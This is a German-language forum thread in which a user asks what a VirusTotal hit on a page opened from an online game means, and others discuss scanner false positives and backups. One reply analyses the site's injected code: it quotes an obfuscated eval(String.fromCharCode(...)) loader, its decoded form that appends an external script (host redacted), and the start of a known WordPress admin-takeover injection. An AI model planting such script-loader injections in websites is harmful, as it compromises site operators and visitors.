Frage zu Virus Total - Ergebnis

  • Guten Abend,

    Vielleicht kann mir hier jemand weiterhelfen.

    Beim spielen von einem Onlinespiel bin ich auf diesen Button gekommen.
    [attachment=2]Spiel 01.png[/attachment]

    Es öffnete sich eine Seite in einem neuen Fenster.
    Die Seite sieht geöffnet so aus:

    [attachment=1]Spiel 03.png[/attachment]

    Ich habe dann mal Virus Total drüber laufenlassen und es gab dieses Ergebnis:
    [attachment=0]Spiel 04.png[/attachment]


    Jetzt zu meinen Fragen:

    Was genau sagt dieses Ergebnis jetzt aus?

    Darf ich jetzt meinen Rechner neu aufsetzen?
    Antivirenprogramm, Malwarebytes etc fanden übrigens nichts.

    Kann man das sofortige Öffnen solcher Sachen in einem neuen Fenster zukünftig unter Firefox verhindern?

  • Wenn das Junkware Removal Tool, der AdwCleaner sowie Malwarebytes nix gefunden haben wird wohl alles gut sein bei dir am lokalen Rechner. Virus Total meldet ja auch nur von einem URL-Scanner eine mögliche Bedrohung bzw. das die Seite als Bedrohung eingestuft wurde.
    Wundersam ist, dass bei dir ein neues Fenster aufgegangen ist und nicht ein neuer Tab.

    Chromebook Lenovo IdeaPad Flex 5 - chromeOS 122 (Stable Channel) - Linux Debian Bookworm: Firefox ESR 115.8.0 und Firefox Nightly, Beta und Main Release (Mozilla PPA), Android 13: Firefox Nightly und Firefox (Main Release)

    Smartphone - Firefox Main Release, Firefox Nightly, Firefox Klar (Main Release)

  • Sorry, Tab meinte ich auch. :oops:

    Bei diesen Spielen passiert das immer wieder mal, lässt sich nicht ganz vermeiden.
    Die Spiele sind bei uns im Forum eingebunden, die zuvor der Forenanbieter zusammengestellt hat und als Spielepaket im Angebot hat. Ich vertraue da schon, daß dort alles okay ist aber man weiss ja nie.

    Danke dir. :klasse:

  • Wenn du uBlock Origin im Profimodus nutzt, könntest du mal versuchen, ob man mit der Pipette den Button und die darunterliegende Funktion entfernen kann...
    BTW: Du hattest leider keine URL angegeben, so konnte ich es nicht vorab testen...


  • .. das Testen kannst du nun aber übernehmen... :D

    Wollte mich schon längst mit diesem Werbeblocker beschäftigen, dann wird das gleich mal eine Zielsetzung wenn ich den Kopf richtig frei habe nach dem KH. Ihr habt hier ja schon ein Thema für.


    Oh je, Dr. Web mal wieder. :roll: Ignoriere die Meldungen dieses Scanners einfach, dieses unsägliche Teil gehört schon längst eingedampft! :grr: Die dort erwähnte Schadware für Linux gibt es bis heute nur bei denen, die "große Welle" existiert einfach nicht.

    Ich hatte von DR.Web vorher noch nie was gehört, gut zu wissen, beruhigt einen gleich. Bin ja sowieso schon übervorsichtig aber 100 Prozent gibt es nicht um auf eine "böse" Seite zu gelangen.

    Danke nochmal an euch für die Antworten. :klasse:

  • Hallo Buntstift!

    Auch wenn ich hier seit einigen Jhhren ausschließlich mit Linux arbeite muß ich dir hier zustimmen:

    Zitat

    ... aber 100 Prozent gibt es nicht ...

    Manche Nutzer schlagen zwar nun die Hände über dem Kopf zusammen oder so, aber auch hier läuft mit ClamAV und HAVP ein Virenscanner! Die wahre Sicherheit kommt jedoch immer aus dem eigenen Kopf, man muß im WWW wirklich ständig auf sein eigenes Verhalten achten.

    Ganz schlimm sind hierbei jene Leute, welche sich auf ihren Virenscanner verlassen. Ich habe da in den inzwischen ca. 35 Jahren beim Arbeiten mit und am Computer auf den Rechnern in meinem Umfeld leider schon so einiges gesehen, da könnte man echt an die Decke gehen...

  • Ich habe in meinen ersten Internet - Jahren überall rumgeklickt ohne über die Folgen nachzudenken. :oops:
    Erst als ich dann das Betriebssystem mal komplett neu aufgesetzt habe, machte es klick, weil sehr viel Arbeit darin steckte. Man geht dann ganz anders mit der technik um.

    Ich habe gerade so einen Fall im Bekanntenkreis, da wurde das Virenprogramm vom Rechner entfernt weil es nur probleme gab aber nichts neues aufgespielt und ein halbes Jahr wurde ohne gesurft. Jetzt wurde auf mein Anraten doch mal eins installiert und beim Durchlauf, wurde dann auch reichlich gefunden. Keinerlei Einsicht, weil die gefundenen Sachen, ganz einfach zu löschen gingen. :roll:

  • Buntstift

    Für mich ist es wichtig geworden, dass ich im Ernstfall immer auf ein sauberes Systemabbild auf einer externen Festplatte zurückgreifen kann. Eine Wiederherstellung geht viel schneller als bei Null anzufangen, wenn das System zerschossen ist. Eventuell dazugekommene Programme und fehlende Updates sind auch schnell wieder nachinstalliert. Auf ein Sicherheitsprogramm verlasse ich mich nicht ganz, ich habe hier ESET NOD 32 laufen.

    Gruß, Nobby

    Lenovo IdeaPad B590 Core-i5 - Windows 10 und 11 Home 64-Bit 22H2/23H2 - Firefox Release aktuell


  • Ich habe mal wieder ein Ergebnis von Virus Total und wollte mal nachfragen, ob diese 2 Befunde aussagekräftig genug sind.

    Die einzige echte Information, die du daraus ziehen kannst, ist die, dass die genannten 2 von 66 Scannern auf der Seite Malware erkannt haben oder eine gewisse Wahrscheinlichkeit dafür.
    Ich wage zu behaupten, dass hier niemand gesichert sagen kann, ob es sich dabei um Fehlalarme handelt oder nicht. Dazu müsste man zumindest die Algorithmen der Scanner kennen und auch wissen, ob der Alarm aufgrund einer eindeutigen Signatur erfolgte oder durch eine Heuristik.
    Man kann allenfalls anhand der Anzahl vermuten, dass die Seite wahrscheinlich harmlos ist. Es bleibt aber eine Vermutung - nichts weiter. Es kann ebenso sein, dass tatsächlich nur diese beiden Scanner die Malware erkannt haben.
    Wie du damit umgehst, musst du am Ende selbst entscheiden.

  • Mein Antivirenprogramm hat nicht gemeckert, bin auf das Ergebnis auch nur durch Virus Total gekommen.
    Der Betreiber der Seite, der informiert wurde, hat sich noch nicht dazu geäussert. Habe aber auch nichts anderes erwartet, da deren Support auch nur nach Lust und Laune arbeitet. :roll:

    Danke für eure Antworten. :klasse:


  • siehe auch: https://sitecheck.sucuri.net/results/ww ... aktuell.de

    Dieser Link liefert wesentlich mehr Informationen als der Screenshot zuvor. Aber weshalb hast du denn nicht die 10 Minuten spendiert, diese weiteren Infos auch zu geben?

    Unter dem Link kann man sich die Payload anschauen. Sie beginnt mit

    Code
    <div class="td-a-rec td-a-rec-id-header "><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99,

    Wenn man die dekodiert, erhält man:

    Code
    var sscript = document.createElement("script");  
    sscript.type = "text/javascript";  
    sscript.src = "https://xxxxxx"; 
    document.head.appendChild(sscript);

    Den Link habe ich unkenntlich gemacht. Das Nachladen eines Scriptes ist nicht ungewöhnlich. Damit ist aber klar, dass der Befund auf einer Signatur beruht, vermutlich auf der Adresse der Domain, von der nachgeladen wird. Die ist anscheinend hinlänglich bekannt.

    Das nachzuladende Script beginnt so:

    Code
    getmeone();
    checkmeone();
    
    
       
     function putmeone()  {
    
    		 var site = extractSummary(document.head.innerHTML);
    		 if(site == "null") { return; }
    		 var newuser_url = site+String.fromCharCode(119, ...

    Weiter habe ich nicht geforscht. "Get me on" und "Check me on" sind ja schon fast selbstsprechend ;-).
    Per Google findet man zu dem Script rasch eine bekannte Injection, deren Ziel es ist, Zugriff auf Admin Accounts von Wordpress-Seiten zu bekommen.
    Demnach richtet sich die Malware in erster Linie gegen den Betreiber der Seite, um dort weiteren Zugriff zu bekommen.


    Habe aber auch nichts anderes erwartet, da deren Support auch nur nach Lust und Laune arbeitet.

    So wie ich das nach der kurzen Recherche sehe, sollte der Betreiber ein ernsthaftes Interesse haben. Er ist das Ziel - (noch) nicht die Besucher.

  • Guten Abend.

    Wollte mal eine Rückmeldung geben.

    Den Laptop habe ich plattgemacht und neu aufgesetzt, läuft jetzt alles viel besser als zuvor.
    Muss mir nur einen neueren Grafiktreiber suchen, sollte im Lenovoforum aber wohl was auffindbar sein.
    Der Betreiber hat sich noch nicht geäussert aber jemand vom Support wollte sich der Sache annehmen.
    Ich erhoffe mir da aber nicht viel, da dort viel gerredet wird aber passiert ist noch nie was.
    Der Mitarbeiter vom Support ist nur ein freiwilliger Helfer und wird dort nicht viel erreichen können.